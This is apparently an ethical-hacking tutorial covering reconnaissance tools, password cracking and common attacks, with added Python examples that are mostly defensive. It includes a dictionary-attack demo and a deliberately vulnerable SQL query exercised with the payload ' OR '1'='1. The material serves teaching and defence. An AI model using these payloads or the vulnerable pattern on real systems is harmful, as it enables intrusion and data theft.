friend's name, age or phone number feed password guessing and brute-force
attacks, and the list of exposed services decides which exploits are worth
trying.

Information gathering is commonly classified into the following categories:

- Footprinting
- Scanning
- Enumeration
- Reconnaissance

1. Nmap

Nmap is an open-source network scanner used to reconnoitre and scan networks.
It discovers hosts, open ports and the services (with versions) listening on
them by sending packets to the host and analysing the responses, and can also
fingerprint the operating system. It is one of the most popular
reconnaissance tools. Scanning is active and noisy: only scan systems you are
authorised to test.

2. Zenmap

Zenmap is the official graphical front end to Nmap and ships with Kali Linux.
It runs the same scans as the command-line tool, shows the equivalent nmap
command line for each scan profile, and adds a topology view and the ability
to compare two scans. It is a free utility for network discovery and security
auditing; systems and network administrators also find it useful for network
inventory, managing service upgrade schedules and monitoring host or service
uptime.

3. whois lookup

WHOIS is a query/response protocol, and the command-line tool that speaks it,
for the registration records of domain names and IP address blocks held by
registrars and regional Internet registries. It is used for many purposes, a
few of which are listed below.

- Network administrators use it to identify and fix DNS or domain-related
issues.
- It is used to check the availability of domain names.
- It is used to identify trademark infringement.
- It can be used to track down the registrants of a fraudulent domain.

Since GDPR many registrars redact the registrant's personal details, so expect
privacy-proxy contacts in the output. To use it, run whois followed by the
domain name in a terminal.

4. SPARTA

SPARTA is a Python-based graphical tool used in the scanning and enumeration
phase of information gathering. It is a toolkit that wraps a collection of
useful tools. A few of its uses:

- It imports Nmap output in XML format (and can run Nmap itself).
- It automates running Nikto against every HTTP service it finds, and similar
tools against other services.
- It saves the results of earlier scans so that they do not need to be
repeated.
- It reuses credentials that have already been found against other hosts,
even when they are not in the wordlist.

To use SPARTA, enter the IP address of the host you want to scan in the host
section to start scanning. SPARTA is no longer maintained; Kali Linux replaced
it with Legion, a fork that keeps the same workflow.
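Nmap's XML output is the interchange format that SPARTA and most other tooling consume, and parsing it yourself is the usual first step in automating the scanning and enumeration phase. The following is an added example, not code from the original page or from the Nmap or SPARTA projects: a parser for a constructed -oX report (RFC 5737 test addresses, made-up services) that keeps only live hosts and open ports, a helper that lists every host exposing a given service, and a wrapper that runs nmap live with "-oX -" so the report arrives on standard output. The sample XML is constructed; the element and attribute names are the ones Nmap actually emits.

```python
import subprocess
import xml.etree.ElementTree as ET

# Constructed sample of Nmap's -oX output for a version scan (RFC 5737 test addresses);
# not a real scan. Produce a real file with: nmap -sV -oX scan.xml <target>
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.0.2.0/29" start="1700000000">
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <hostnames><hostname name="web.example.test" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="8.9p1" method="probed" conf="10"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
        <service name="http" product="nginx" version="1.18.0" method="probed" conf="10"/></port>
      <port protocol="tcp" portid="443"><state state="filtered" reason="no-response"/>
        <service name="https" method="table" conf="3"/></port>
    </ports>
  </host>
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="192.0.2.11" addrtype="ipv4"/>
    <hostnames/>
    <ports>
      <port protocol="tcp" portid="3389"><state state="open" reason="syn-ack"/>
        <service name="ms-wbt-server" product="Microsoft Terminal Services" method="probed" conf="10"/></port>
    </ports>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.0.2.12" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return a list of live hosts, each with its open ports and detected services."""
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.findall("host"):
        if host.find("status").get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']")
        hostname = host.find("hostnames/hostname")
        services = []
        for port in host.findall("ports/port"):
            if port.find("state").get("state") != "open":
                continue
            svc = port.find("service")
            services.append({
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "name": svc.get("name") if svc is not None else None,
                "product": svc.get("product") if svc is not None else None,
                "version": svc.get("version") if svc is not None else None,
            })
        hosts.append({
            "ip": addr.get("addr") if addr is not None else None,
            "hostname": hostname.get("name") if hostname is not None else None,
            "services": services,
        })
    return hosts


def hosts_with_service(hosts, service_name):
    """(ip, port) pairs exposing a given service, e.g. every open SSH or RDP listener."""
    return [(h["ip"], s["port"]) for h in hosts for s in h["services"] if s["name"] == service_name]


def scan_and_parse(target):
    """Run nmap live (needs the nmap binary and authorisation to scan the target) and parse
    its report from stdout; '-oX -' makes nmap write the XML to standard output."""
    result = subprocess.run(["nmap", "-sV", "-oX", "-", target],
                            capture_output=True, text=True, check=True)
    return parse_nmap_xml(result.stdout)


if __name__ == "__main__":
    for h in parse_nmap_xml(SAMPLE_NMAP_XML):
        print(h["ip"], h["hostname"], [(s["port"], s["name"], s["product"]) for s in h["services"]])
    print("RDP exposed on:", hosts_with_service(parse_nmap_xml(SAMPLE_NMAP_XML), "ms-wbt-server"))
```

The filtered 443 and the down host drop out, leaving two hosts and three open services, and the RDP listener on 192.0.2.11 is the one a tester (or an attacker) would look at first. xml.etree is fine for reports you generated yourself; for XML files of unknown origin parse with the defusedxml package instead, since the standard parser expands entities.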

5. nslookup

nslookup stands for "name server lookup"; it is a command that queries a DNS
server for a domain name, an IP address mapping or any other DNS record, and
is also handy for troubleshooting DNS problems. Typical uses:

- get the IP address of a domain (A record);
- reverse DNS lookup (PTR record);
- look up any record type;
- look up an SOA record;
- look up NS records;
- look up MX records;
- look up TXT records.
APPLICATION ATTACK in cyber security

An application attack is one in which criminals gain access to areas of an
application they are not authorized to reach. Attackers most commonly start at
the application layer, hunting for vulnerabilities in the application's own
code (injection flaws, broken authentication or access control, insecure
deserialization and the like).

What is an application-level attack?

An application-layer attack targets a computer by deliberately triggering a
fault in its operating system or applications. The fault lets the attacker
bypass normal access controls; they then use that foothold to take control of
the application, the system or the network.
Cracking Techniques IN CYBER SECURITY

Common password-cracking techniques

- Brute force attack: the attacker tries every combination of characters until
the correct one is found; feasible only for short or low-entropy passwords.
- Dictionary attack: candidates are taken from a wordlist of common passwords
and leaked credentials, often with rule-based mutations (capitalisation,
appended digits).
- Rainbow table attack: a precomputed table maps hashes back to passwords; it
works only against unsalted hashes.
- Social engineering: the password is talked out of its owner.
- Phishing: the owner types it into a fake login page.

What is cracking in cyber security?

Cracking is when someone performs a security hack for criminal or malicious
reasons; the person is called a "cracker". Just as a bank robber cracks a safe
by skilfully manipulating its lock, a cracker breaks into a computer system,
program or account with the aid of technical skill.

What is password cracking in cyber security?

In cryptanalysis and computer security, password cracking is the process of
recovering passwords from data that has been stored in or transmitted by a
computer system in scrambled (hashed) form.

What tools do hackers use to crack?

Popular password-cracking software:

- CrackStation (online hash lookup)
- Password Cracker
- Brutus
- Aircrack-ng (Wi-Fi keys)
- RainbowCrack
- THC Hydra (online login brute-forcing)
- Cain and Abel
- Medusa (online login brute-forcing)

The two tools most practitioners actually reach for, John the Ripper and
hashcat, are missing from this list; both are offline crackers that support
hundreds of hash formats and GPU acceleration.
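The brute-force, dictionary and rainbow-table entries above, and the password-attack section earlier, come down to one question: how much work does each guess cost the attacker, and can that work be done once and reused? The following is an added example, not code from the original page or from any of the tools listed: an unsalted SHA-256 store that a precomputed lookup table (a tiny stand-in for a rainbow table) reverses instantly, next to a salted, iterated PBKDF2 store against which a dictionary attack has to pay the full key-derivation cost for every guess, per account. The wordlist, accounts and salts are constructed; the iteration count is deliberately below current OWASP guidance so the example runs quickly.

```python
import hashlib
import hmac
import os

# Constructed wordlist and accounts; not real credentials.
WORDLIST = ["123456", "password", "letmein", "qwerty", "Summer2021", "welcome1"]
ITERATIONS = 100_000  # kept low for the example; OWASP recommends 600k for PBKDF2-SHA256


def unsalted_sha256(password):
    """How passwords must NOT be stored: one fast hash, identical for every user."""
    return hashlib.sha256(password.encode()).hexdigest()


def salted_pbkdf2(password, salt, iterations=ITERATIONS):
    """A slow, per-user-salted KDF (PBKDF2-HMAC-SHA256); bcrypt, scrypt or Argon2 are preferable."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


# A precomputed lookup table: computed once, then every unsalted hash seen anywhere, from
# any breach, is reversed with a single dictionary lookup. Rainbow tables are the
# space-efficient version of this idea.
PRECOMPUTED = {unsalted_sha256(w): w for w in WORDLIST}


def crack_unsalted(digest_hex):
    """Reverse an unsalted hash by lookup; no hashing at attack time."""
    return PRECOMPUTED.get(digest_hex)


def crack_salted(salt, target, wordlist=WORDLIST, iterations=ITERATIONS):
    """Dictionary attack: with a unique salt there is nothing to precompute, so each
    candidate costs a full KDF evaluation for this one account. Returns (password, guesses)."""
    for guesses, word in enumerate(wordlist, start=1):
        if hmac.compare_digest(salted_pbkdf2(word, salt, iterations), target):
            return word, guesses
    return None, len(wordlist)


def new_account(password):
    """What a server should store: a random 16-byte salt plus the KDF output."""
    salt = os.urandom(16)
    return salt, salted_pbkdf2(password, salt)


if __name__ == "__main__":
    print("unsalted sha256('letmein') ->", crack_unsalted(unsalted_sha256("letmein")))
    salt, stored = new_account("qwerty")
    print("salted pbkdf2, weak password ->", crack_salted(salt, stored))
    salt, stored = new_account("correct horse battery staple")
    print("salted pbkdf2, passphrase not in list ->", crack_salted(salt, stored))
```

The salted store still falls to a dictionary attack when the password is in the list; salting and iteration only make each guess expensive and non-reusable, so the defence against weak passwords remains screening them against breach corpora at registration and requiring a second factor. The constant-time comparison is there because a verifier that short-circuits on the first differing byte leaks timing information about the stored hash.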

The Rise of Cyber Attacks

In recent years cyberattacks have become more sophisticated, increasing the
need for a comprehensive cybersecurity strategy and tooling.

The world recorded a steep increase in cyber attacks and cybercrime in 2020.
According to CrowdStrike's 2020 Threat Hunting Report, which analyzes
intrusion attempts within the CrowdStrike customer base, more intrusions were
attempted in the first half of 2020 than in all of 2019: the threat hunting
team reported roughly 41,000 potential intrusions from January through June
2020, compared with 35,000 for the whole of the previous year. The report's
headline figure of a 154% year-on-year increase compares like periods (first
half of 2020 against first half of 2019); setting 41,000 against the full-year
35,000 would understate the rise.

This increase may be attributed to several factors, including:

- the COVID-19 pandemic and stay-at-home orders, which dramatically increased
the amount of time people spent online;
- the shift to remote work (an existing trend that COVID-19 rapidly
accelerated), which increased the use of personal devices and home networks,
expanding the attack surface of organizations;
- the proliferation of connected devices and Internet of Things (IoT)
technology, which provide a plethora of entry points for cybercriminals;
- the shift to the cloud, which requires a fundamentally different security
strategy from that of traditional on-premises networks;
- 5G technology, which is further fuelling the use of connected devices; and
- the availability of hackers "as a service", which makes ransomware and other
malware attacks available to those who lack the expertise to carry them out
personally.

How To Protect Against Cyber Attacks

A comprehensive cybersecurity strategy is essential in today's connected
world. From a business perspective, securing the organization's digital assets
reduces the risk of loss, theft or destruction of data, and of having to pay a
ransom to regain control of company data or systems. By preventing or quickly
remediating attacks, the organization also minimizes their impact on business
operations. Finally, an organization that deters adversaries protects its
brand from the reputational harm that so often accompanies security
incidents, especially those involving the loss of customer data.

Below are some recommendations CrowdStrike offered in its 2020 Global Security
Attitude Survey to help organizations improve their security posture and
ensure cybersecurity readiness (the product names are CrowdStrike's own):

- Continue to invest in digital transformation to keep pace with eCrime and
nation-state threats. Replacing legacy, on-premises technologies with
cloud-native platforms, such as CrowdStrike Falcon®, designed to protect
remote and hybrid environments will be critical to ensuring protection in the
work-from-anywhere environments that are here to stay.
- Focus on protecting all workloads wherever they are, rather than maintaining
security models built around network perimeters. A solution such as
CrowdStrike® Falcon Cloud Workload Protection provides breach protection
across private, public, hybrid and multi-cloud environments so you can rapidly
adopt and secure technology across any workload.
- Integrate identity protection with run-time protection of workloads,
endpoints and mobile devices, to relieve the strain on IT teams and keep the
organization secure while it plans, implements and migrates to the
cloud-native applications it needs, wherever employees are located.
- Strive to meet the 1-10-60 rule CrowdStrike introduced in 2018: one minute
to detect a threat, 10 minutes to investigate it and 60 minutes to contain and
remediate. The survey found that organizations take an average of 117 hours
just to detect an incident or intrusion (barely improved from 120 hours in
2019), and many more to investigate and contain it. The CrowdStrike Falcon
platform is pitched as shortening the time to investigate and understand a
threat by providing deep context, integrated threat intelligence and
visualizations.

Types of attacks on a system

Operating System Attacks

Today’s Operating Systems (OS) are loaded with features and are increasingly
complex. While users take advantage of these features, the systems become prone
to more vulnerabilities, thus enticing attackers. Operating systems run many services
such as graphical user interfaces (GUIs) that support applications and system tools,
and enable Internet access. Extensive tweaking is required to lock them
down. Attackers constantly look for OS vulnerabilities that allow them to exploit
and gain access to a target system or network. To stop attackers from
compromising the network, the system or network administrators must keep
abreast of various new exploits and methods adopted by attackers, and monitor the
networks regularly.
By default, most operating systems’ installation programs install a large number of
services and open ports. This situation gives attackers a wide surface on which to
search for vulnerabilities. Applying patches and hot fixes is not easy with today’s
complex networks. Most patches and fixes tend to solve an immediate issue. In
order to protect the system from operating system attacks in general, it is necessary
to remove and/or disable any unneeded ports and services.
Some OS vulnerabilities include:
– Buffer overflow vulnerabilities
– Bugs in the operating system
– An unpatched operating system
Attacks performed at the OS level include:
– Exploiting specific network protocol implementations
– Attacking built-in authentication systems
– Breaking file-system security
– Cracking passwords and encryption mechanisms

Misconfiguration Attacks
Security misconfiguration or poorly configured security controls might allow
attackers to gain unauthorized access to the system, compromise files, or perform
other unintended actions. Misconfiguration vulnerabilities affect web servers,
application platforms, databases, networks, or frameworks and may result in illegal
access or possible system takeover. Administrators should change the default
configuration of the devices before deploying them in the production network. To
optimize the configuration of the machine, remove any unneeded services or
software. Automated scanners detect missing patches, misconfiguration, use of
default accounts, unnecessary services, and so on.
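The advice in the two sections above (disable unneeded ports and services, and scan for the things a default install leaves open) can be turned into a small audit. The following is an added example, not code from the page or from any vendor it mentions: it parses output in the format of `ss -tulpn` and reports every listener bound to a non-loopback address whose protocol and port are not on an allowlist. The sample output, the process names and the allowlist are constructed for the example; on a real host you would feed it the live output of `ss -tulpn`.

```python
import re
from dataclasses import dataclass

# Constructed sample in the layout of `ss -tulpn` (not captured from a real host).
SAMPLE_SS_OUTPUT = """\
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
tcp   LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=812,fd=3))
tcp   LISTEN 0      511    0.0.0.0:80         0.0.0.0:*         users:(("nginx",pid=1021,fd=6))
tcp   LISTEN 0      80     127.0.0.1:3306     0.0.0.0:*         users:(("mysqld",pid=1300,fd=21))
tcp   LISTEN 0      128    0.0.0.0:5900       0.0.0.0:*         users:(("x11vnc",pid=1450,fd=4))
udp   UNCONN 0      0      0.0.0.0:111        0.0.0.0:*         users:(("rpcbind",pid=600,fd=5))
"""


@dataclass(frozen=True)
class Listener:
    proto: str
    addr: str
    port: int
    process: str


# proto, state, recv-q, send-q, local addr:port, peer, then the first process name.
LINE_RE = re.compile(
    r'^(tcp|udp)\s+\S+\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+users:\(\("([^"]+)"'
)

LOOPBACK = {"127.0.0.1", "::1", "[::1]"}


def parse_ss(output: str) -> list:
    """Turn `ss -tulpn` lines into Listener records; the header line is skipped."""
    listeners = []
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if m:
            proto, addr, port, process = m.groups()
            listeners.append(Listener(proto, addr, int(port), process))
    return listeners


def audit_listeners(listeners: list, allowed: set) -> list:
    """Return listeners reachable from the network (not loopback-only) whose
    (proto, port) pair is not in the allowlist. Everything returned is a
    candidate for 'remove or disable'."""
    return [
        l for l in listeners
        if l.addr not in LOOPBACK and (l.proto, l.port) not in allowed
    ]


if __name__ == "__main__":
    # Constructed allowlist: only SSH and HTTP are expected on this host.
    allowed = {("tcp", 22), ("tcp", 80)}
    for finding in audit_listeners(parse_ss(SAMPLE_SS_OUTPUT), allowed):
        print(f"unexpected {finding.proto}/{finding.port} on {finding.addr}: {finding.process}")
```

With the constructed sample the audit reports the VNC server on tcp/5900 and rpcbind on udp/111; mysqld is bound to 127.0.0.1 only and is therefore not reported, which is the distinction between a service that exists and one that widens the attack surface.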
Top 10 Most Common Types of Cyber Attacks

Application-Level Attacks
Software developers are often under intense pressure to meet deadlines, which can
mean they do not have sufficient time to completely test their products before
shipping them, leaving undiscovered security holes. This is particularly
troublesome in newer software applications that come with a large number of
features and functionalities, making them more and more complex. An increase in
the complexity means more opportunities for vulnerabilities. Attackers find and
exploit these vulnerabilities in the applications using different tools and techniques
to gain unauthorized access and steal or manipulate data.
Security is not always a high priority for software developers, who often handle it
as an “add-on” component after release. This means that not all instances of the
software will have the same level of security. Error checking in these applications
can be very poor (or even nonexistent), which leads to:
• Buffer overflow attacks
• Sensitive information disclosure
• Denial-of-service attacks
• SQL injection attacks
• Cross-site scripting
• Phishing
• Session hijacking
• Parameter/form tampering
• Man-in-the-middle attacks
• Directory traversal attacks

Shrink-Wrap Code Attacks

Software developers often use free libraries and code licensed from other sources
in their programs to reduce development time and cost. This means that large
portions of many pieces of software will be the same, and if an attacker discovers
vulnerabilities in that code, many pieces of software are at risk.
Attackers exploit default configuration and settings of the off-the-shelf libraries
and code. The problem is that software developers leave the libraries and code
unchanged. They need to customize and fine-tune every part of their code in order
to make it not only more secure, but different enough so that the same exploit will
not work. 
An attack can be active or passive. An “active attack” attempts to alter system
resources or affect their operation. A “passive attack” attempts to learn or make
use of information from the system but does not affect system resources
(e.g., wiretapping). You can learn about all types of attack in the CEH v10 course at
the Infosavvy location in Mumbai. Infosavvy provides Certified Ethical Hacking
training and EC-Council certification.
 
Man-in-the-middle (MitM) attack
A MitM attack occurs when an attacker inserts themselves between the communications
of a client and a server. Here are some common types of man-in-the-middle attacks:
Session hijacking
In this type of MitM attack, an attacker hijacks a session between a trusted client
and a network server. The attacking computer substitutes its IP address for the
trusted client’s while the server continues the session, believing it is communicating
with the client. As an example, the attack might unfold like this:
1. A client connects to a server.
2. The attacker’s computer gains control of the client.
3. The attacker’s computer disconnects the client from the server.
4. The attacker’s computer replaces the client’s IP address with its own IP address
and spoofs the client’s sequence numbers.
5. The attacker’s computer continues the dialog with the server, and the
server believes it is still communicating with the client.

IP Spoofing
IP spoofing is used by an attacker to convince a system that it’s communicating
with a known, trusted entity and provide the attacker with access to the system.
The attacker sends a packet with the IP source address of a known, trusted host
rather than its own IP source address to a target host. The target host might accept
the packet and act upon it.

Replay
A replay attack occurs when an attacker intercepts and saves old messages and then
tries to send them later, impersonating one of the participants. This type can be
easily countered with session timestamps or a nonce (a random number or a string
that changes with time).
Currently, there is no single technology or configuration to stop all MitM attacks.
Generally, encryption and digital certificates provide an effective safeguard against
MitM attacks, assuring both the confidentiality and integrity of communications.
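The replay countermeasure described above (timestamps plus a nonce) only works if the two values are bound to the message so that a captured message cannot be re-stamped. The following is an added example, not code from the page: each message carries a timestamp and a random nonce, an HMAC over timestamp, nonce and payload ties them together, and the receiver rejects bad tags, stale timestamps and nonces it has already seen inside the acceptance window. The shared key is assumed to be pre-established between the two parties; for the demonstration one object plays both sender and receiver, and the `now` parameter lets the clock be set explicitly.

```python
import hashlib
import hmac
import os
import time


class ReplayProtectedChannel:
    """Replay protection for an authenticated channel: every message carries a
    timestamp and a fresh random nonce, and an HMAC over (timestamp, nonce,
    payload) binds them so none of the three can be altered without
    invalidating the tag."""

    def __init__(self, key: bytes, window_seconds: int = 30):
        self.key = key                 # shared secret, assumed pre-established
        self.window = window_seconds   # how far a timestamp may drift from "now"
        self.seen = {}                 # nonce -> timestamp, for nonces still in the window

    def _tag(self, ts: int, nonce: str, payload: str) -> str:
        msg = f"{ts}|{nonce}|{payload}".encode()
        return hmac.new(self.key, msg, hashlib.sha256).hexdigest()

    def send(self, payload: str, now=None) -> dict:
        """Sender side: stamp the message with the current time and a 128-bit nonce."""
        ts = int(time.time() if now is None else now)
        nonce = os.urandom(16).hex()
        return {"ts": ts, "nonce": nonce, "payload": payload,
                "tag": self._tag(ts, nonce, payload)}

    def receive(self, msg: dict, now=None) -> tuple:
        """Receiver side: verify the tag first, then freshness, then uniqueness."""
        now = int(time.time() if now is None else now)
        expected = self._tag(msg["ts"], msg["nonce"], msg["payload"])
        if not hmac.compare_digest(expected, msg["tag"]):
            return (False, "bad tag")             # tampered or forged
        if abs(now - msg["ts"]) > self.window:
            return (False, "stale timestamp")     # an old capture (or a clock far off)
        self._forget_expired(now)
        if msg["nonce"] in self.seen:
            return (False, "replayed nonce")      # same message resent inside the window
        self.seen[msg["nonce"]] = msg["ts"]
        return (True, "ok")

    def _forget_expired(self, now: int) -> None:
        # Nonces older than the window can be dropped: the timestamp check
        # already rejects any replay of them, so the cache stays bounded.
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.window}


if __name__ == "__main__":
    channel = ReplayProtectedChannel(b"constructed-demo-key")
    first = channel.send("transfer 10", now=1000)
    print(channel.receive(first, now=1005))   # accepted
    print(channel.receive(first, now=1010))   # same capture again: rejected
```

Because the timestamp is inside the HMAC, an attacker holding a captured message can neither refresh its timestamp nor change its payload, and resending it unchanged hits either the nonce cache or the freshness window.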

To reduce the risk of being phished, you can use these techniques:

• Critical thinking — don’t accept that an email is the real deal just
because you’re busy or stressed or you have 150 other unread
messages in your inbox. Stop for a moment and analyze the email.
• Hovering over the links — Move your mouse over the link, but don’t click
it! Just let your mouse cursor hover over the link and see where it would
actually take you. Apply critical thinking to decipher the URL.
• Analyzing email headers — Email headers define how an email got to
your address. The “Reply-to” and “Return-Path” parameters should lead to
the same domain as is stated in the email.
• Sandboxing — you can test email content in a sandbox environment,
logging activity from opening the attachment or clicking the links inside the
email.
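Two of the checks above (the Reply-To/Return-Path domains should match the sender's domain, and a link's visible text should match where it really points) are mechanical enough to automate. The following is an added example, not code from the page: it parses a raw message with the standard-library `email` package, compares the domains of the address headers, and flags anchors whose displayed URL names a different host than the `href`. The message is constructed for the example and uses only the reserved `.example` top-level domain.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed message; every domain is under the reserved .example TLD.
SAMPLE_EMAIL = """\
From: "Acme Billing" <billing@acme.example>
Reply-To: support@acme-help.example
Return-Path: <bounce@mailer-xyz.example>
Subject: Invoice overdue
Content-Type: text/html

<p>Your invoice is overdue. Pay now at
<a href="http://acme.example.login-portal.example/pay">https://acme.example/pay</a></p>
"""

# href value and the anchor's visible text.
ANCHOR_RE = re.compile(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)


def domain_of(header_value) -> str:
    """Domain part of an address header such as From or Reply-To ('' if absent)."""
    _, addr = parseaddr(header_value or "")
    return addr.rsplit("@", 1)[1].lower() if "@" in addr else ""


def analyze_email(raw: str) -> list:
    """Return human-readable findings; an empty list means nothing suspicious."""
    msg = message_from_string(raw)
    findings = []

    # Header check: Reply-To and Return-Path should belong to the From domain.
    from_domain = domain_of(msg["From"])
    for header in ("Reply-To", "Return-Path"):
        domain = domain_of(msg[header])
        if domain and domain != from_domain:
            findings.append(f"{header} domain {domain} differs from From domain {from_domain}")

    # Link check: what the link text shows versus where the href really goes.
    body = msg.get_payload()  # the sample is a single-part text/html message
    for href, text in ANCHOR_RE.findall(body):
        shown = text.strip()
        if shown.lower().startswith(("http://", "https://")):
            shown_host = urlparse(shown).hostname
            real_host = urlparse(href).hostname
            if shown_host != real_host:
                findings.append(f"link text shows {shown_host} but href goes to {real_host}")
    return findings


if __name__ == "__main__":
    for finding in analyze_email(SAMPLE_EMAIL):
        print("-", finding)
```

The link finding is the automated form of "hover over the link": the displayed `https://acme.example/pay` is only text, and the host that would actually be contacted is the last label group before the path in the `href`, here `acme.example.login-portal.example`.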

Drive-by attack
Drive-by download attacks are a common method of spreading malware.
Hackers search for insecure websites and plant a malicious script into HTTP
or PHP code on one of the pages. This script might install malware directly
onto the computer of someone who visits the site, or it might redirect the victim to a
site controlled by the hackers. Drive-by downloads can happen when visiting a website
or viewing an email message or a pop-up window. Unlike many other types of
cyber security attacks, a drive-by doesn’t rely on a user to do anything to actively
enable the attack — you don’t need to click a download button or open a malicious
email attachment to become infected. A drive-by download can take advantage of an
app, operating system or web browser that contains security flaws due to
unsuccessful updates or lack of updates.
To protect yourself from drive-by attacks, you need to keep your browsers
and operating systems up to date and avoid websites that may contain malicious
code. Stick to the sites you normally use — although keep in mind that even
these sites can be hacked. Don’t keep too many unnecessary programs and apps
on your device. The more plug-ins you have, the more vulnerabilities there are
that can be exploited by drive-by attacks.

Password attack

Because passwords are the most commonly used mechanism to authenticate
users to an information system, obtaining passwords is a common and
effective attack approach. Access to a person’s password can be obtained by
looking around the person’s desk, ‘‘sniffing’’ the connection to the network to
acquire unencrypted passwords, using social engineering, gaining access to a
password database or outright guessing. The last approach can be done in either
a random or systematic manner:
• Brute-force: password guessing means using a random approach by trying
different passwords and hoping that one works. Some logic can be applied by
trying passwords related to the person’s name, job title, hobbies or similar items.
• Dictionary attack: a dictionary of common passwords is used to attempt to
gain access to a user’s computer and network. One approach is to copy an
encrypted file that contains the passwords, apply the same encryption to a
dictionary of commonly used passwords, and compare the results.
In order to protect yourself from dictionary or brute-force attacks, you need
to implement an account lockout policy that will lock the account after a few
invalid password attempts. You can follow account lockout best practices in order
to set it up correctly.
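The account lockout policy recommended above has three knobs that matter: how many failures are tolerated, over what observation window they are counted, and how long the lock lasts. The following is an added example, not code from the page: a login guard that counts recent failures per account, locks the account once the threshold is reached, and refuses every attempt during the lock (even a correct password) so that the login form cannot be used as a guessing oracle. The credential store and `demo_verify` are constructed for the example; a real system would verify a salted password hash.

```python
import hmac
from collections import defaultdict
from typing import Callable


class LoginGuard:
    """Account lockout: after `threshold` failed attempts within
    `observation_seconds`, the account is locked for `lockout_seconds`."""

    def __init__(self, verify: Callable[[str, str], bool], threshold: int = 5,
                 lockout_seconds: int = 900, observation_seconds: int = 900):
        self.verify = verify
        self.threshold = threshold
        self.lockout = lockout_seconds
        self.observation = observation_seconds
        self.failures = defaultdict(list)   # username -> timestamps of recent failures
        self.locked_until = {}              # username -> time the lock expires

    def attempt(self, username: str, password: str, now: float) -> str:
        """Returns 'ok', 'denied' or 'locked'. `now` is passed in explicitly so
        the behaviour is deterministic; production code would use time.time()."""
        until = self.locked_until.get(username)
        if until is not None and now < until:
            return "locked"                 # refused without consulting the password
        # Only failures inside the observation window count toward the threshold.
        recent = [t for t in self.failures[username] if now - t <= self.observation]
        if self.verify(username, password):
            self.failures[username] = []
            self.locked_until.pop(username, None)
            return "ok"
        recent.append(now)
        if len(recent) >= self.threshold:
            self.locked_until[username] = now + self.lockout
            self.failures[username] = []
            return "locked"
        self.failures[username] = recent
        return "denied"


# Constructed credential check for the demo (a real system compares salted hashes).
DEMO_CREDENTIALS = {"alice": "correct-horse-battery-staple"}


def demo_verify(username: str, password: str) -> bool:
    expected = DEMO_CREDENTIALS.get(username, "")
    return hmac.compare_digest(expected.encode(), password.encode())


if __name__ == "__main__":
    guard = LoginGuard(demo_verify, threshold=3, lockout_seconds=600)
    for t, pw in enumerate(["guess1", "guess2", "guess3", "correct-horse-battery-staple"]):
        print(t, pw, "->", guard.attempt("alice", pw, now=t))
```

One design point the "best practices" advice alludes to: a lockout that is too aggressive lets anyone lock a victim out by deliberately failing a few logins, so the threshold and lock duration are a trade-off between guessing resistance and self-inflicted denial of service.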

SQL injection attack

SQL injection has become a common issue with database-driven websites. It
occurs when a malefactor executes a SQL query against the database via the input
data sent from the client to the server. SQL commands are inserted into data-plane
input (for example, in place of the login or password) in order to run predefined SQL
commands. A successful SQL injection exploit can read sensitive data from the
database, modify (insert, update or delete) database data, execute administration
operations (such as shutdown) on the database, recover the content of a given file,
and, in some cases, issue commands to the OS.
For example, a web form on a website might request a user’s account name and then
send it to the database in order to pull up the associated account information using
dynamic SQL like this:
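The dynamic-SQL lookup the paragraph refers to, shown beside the fix, as an added example that is not code from the page: the first function builds the statement by string concatenation, so input that contains a quote changes the query's structure; the second passes the value as a bound parameter, so it can only ever be compared as data. The `users` table and its rows are constructed for the example, and an in-memory SQLite database stands in for the website's database.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """Constructed table standing in for the website's account database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (account TEXT, owner TEXT, balance INTEGER)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("1001", "alice", 500), ("1002", "bob", 750)],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, account: str) -> list:
    """Dynamic SQL: the client-supplied value becomes part of the statement text,
    so a value containing a quote rewrites the WHERE clause."""
    query = "SELECT account, owner, balance FROM users WHERE account = '" + account + "'"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, account: str) -> list:
    """Parameterized query: the value is bound as data by the driver and is
    compared literally, whatever characters it contains."""
    return conn.execute(
        "SELECT account, owner, balance FROM users WHERE account = ?", (account,)
    ).fetchall()


if __name__ == "__main__":
    conn = make_demo_db()
    # The textbook tautology payload: it turns the WHERE clause into
    # account = '' OR '1'='1', which matches every row.
    payload = "' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(conn, payload))   # both accounts
    print("safe:      ", lookup_safe(conn, payload))         # no such account
```

The difference is not in the SQL text but in who parses it: with a bound parameter the database plans the statement before it ever sees the value, which is why the parameterized version returns nothing for the tautology input rather than every row.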

Cross-site scripting (XSS) attack

XSS attacks use third-party web resources to run scripts within the victim’s
browser or scriptable application. Specifically, the attacker injects a payload
with malicious JavaScript into a website’s database. When the victim requests a
page from the website, the website transmits the page, with the attacker’s
payload as a part of the HTML body, to the victim’s browser, which executes the
malicious script. For instance, it could send the victim’s cookie to the attacker’s
server, and the attacker can then extract it and use it for session hijacking. The
most dangerous consequences occur when XSS is used to take advantage
of additional vulnerabilities. These vulnerabilities can enable an attacker to not
